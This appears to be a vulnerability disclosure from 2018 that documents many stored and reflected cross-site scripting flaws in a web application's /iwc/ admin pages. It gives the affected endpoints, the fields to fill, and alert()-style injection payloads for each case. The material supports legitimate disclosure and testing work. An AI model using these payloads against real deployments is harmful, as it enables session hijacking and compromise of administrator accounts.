James Otten 8/30/2018
All items tested in versions 11.1.468 and 12.0.3074.
- As a low privileged read only user, navigate to
/iwc/reports.iwc?repo_id=1&db_id=&filterDbId=<svg/onload=alert(/error_log/)>&type=&pm=P
- As a privileged user, go to
/iwc/logViewer.iwc
and view the contents of the iwc or error log. - XSS experienced.
- As a privileged user, navigate to
/iwc/userAdministration.iwc?action=3&addType=0&pm=P
and try to add a user with the name<img src=x onerror=alert(\add_user\)>
- As a privileged user, go to
/iwc/logViewer.iwc
and view the contents of the iwc or error log. - XSS experienced.
There are several other ways to get XSS on /iwc/logViewer.iwc
- As a privileged user, go to
/iwc/centralManage.cen
. - Add a server.
- For "Notes" use
<img src=x onerror=alert(/notes/)>
. - After saving, click notes for the server you added.
- XSS experienced.
- As a privileged user, go to
/iwc/centralManage.cen
. - Add a server.
- For "Display Name" use
"onmouseover=alert(/1/)//
. - For "Server Name" use
"onmouseover=alert(/2/)//
. - For "Notes" use "AAAA".
- After saving, mouse over the notes for the server you added.
- XSS experienced.
- Edit the server you added.
- Mouse over the "Display Name" textbox.
- XSS experienced.
- Mouse over the "Server Name" textbox.
- XSS experienced.
- As a privileged user, go to
/iwc/userAdministration.iwc?action=1&pm=P
. - Add a user.
- For "Name" use
<input/autofocus/onfocus=alert(1)>
. - After saving, delete the user.
- XSS experienced.
- As a privileged user, go to
/iwc/customMetrics.iwc?pm=P
. - Add a custom metric.
- For "Display Name" use
<img src=x onerror=alert(/custom_resource_metric_display_name/)>
. - After saving, view the "Resources" tab in the context of a database instance.
- XSS experienced.
- As a privileged user, go to
/iwc/customMetrics.iwc?pm=P
. - Add a custom metric.
- For "Description" use
<img src=x onerror=alert(/custom_resource_metric_description/)>
. - After saving, view the "Resources" tab in the context of a database instance.
- Click "Add Resource Chart" and select your resource.
- Click the gear to view the settings for your resource and you are taken to
/iwc/healthMetricsConfigure.iwc
. - XSS experienced.
- As a privilidged user, navigate to
/iwc/adminManage.iwc?pm=P
and add or modify an existing "Instance Group". - Set the "Name" to your XSS payload
<img src=x onerror=alert(/instance_group/)>
- Save (XSS experienced with popup message).
- View one of the instances that is a part of your new "Instance Group", for example
/iwc/database.iwc?dbGroup_id=1&repo_id=1
- XSS experienced.
- As a privilidged user, navigate to
/iwc/alertMain.iwc?tab=1&pm=P
and go to the "Alert Groups" tab. - Click "Create Alert Group".
- For "Group Name" use
<img src=x onerror=alert(/alert_group_name/)>
- Add an alert, a database instance, and save.
- XSS experienced in popup message.
- If your "Name" is long enough, and you mouse over the "Name" column for the row you added, you will get XSS with the tooltip (showToolTip in the common js library).
- Click on the "Alert Status" tab or the "Manage Alerts" tab.
- View an alert that would be in the alert group you created.
- XSS experienced on
/iwc/alertManagement.iwc
- Go back to the "Alert Groups" tab and delete the item you added.
- XSS experienced.
- As a privilidged user, navigate to
/iwc/eventAnnotations.iwc?pm=P
and select a database instance. - Click "Add Annotation".
- For "Annotation" use
<img src=x onerror=alert(/annotation_name/)>
. - For "Occurred At" use the current time.
- For "Details" use
<img src=x onerror=alert(/annotation_desc/)>
- For "Created By" use
<img src=x onerror=alert(/annotation_created_by/)>
- Save.
- XSS experienced on the "Annotations" page, for example
/iwc/eventAnnotations.iwc?pm=P&dbId=1
. - View "Trends" for the database instance you added the annotation, for example
/iwc/database.iwc?repo_id=1&db_id=1&pm=P
- Click on the annotation you created.
- XSS experienced for "Details" and "Created By".
- As a privileged user, go to
/iwc/centralManage.cen
. - Add a server.
- For "Display Name" use "Mouse over me".
- For "Server Name" use
') | alert()//
. - After saving, navigate to
/iwc/central.cen
. - Mouse over the server you added in the "Unavailable Servers" table.
- XSS experienced.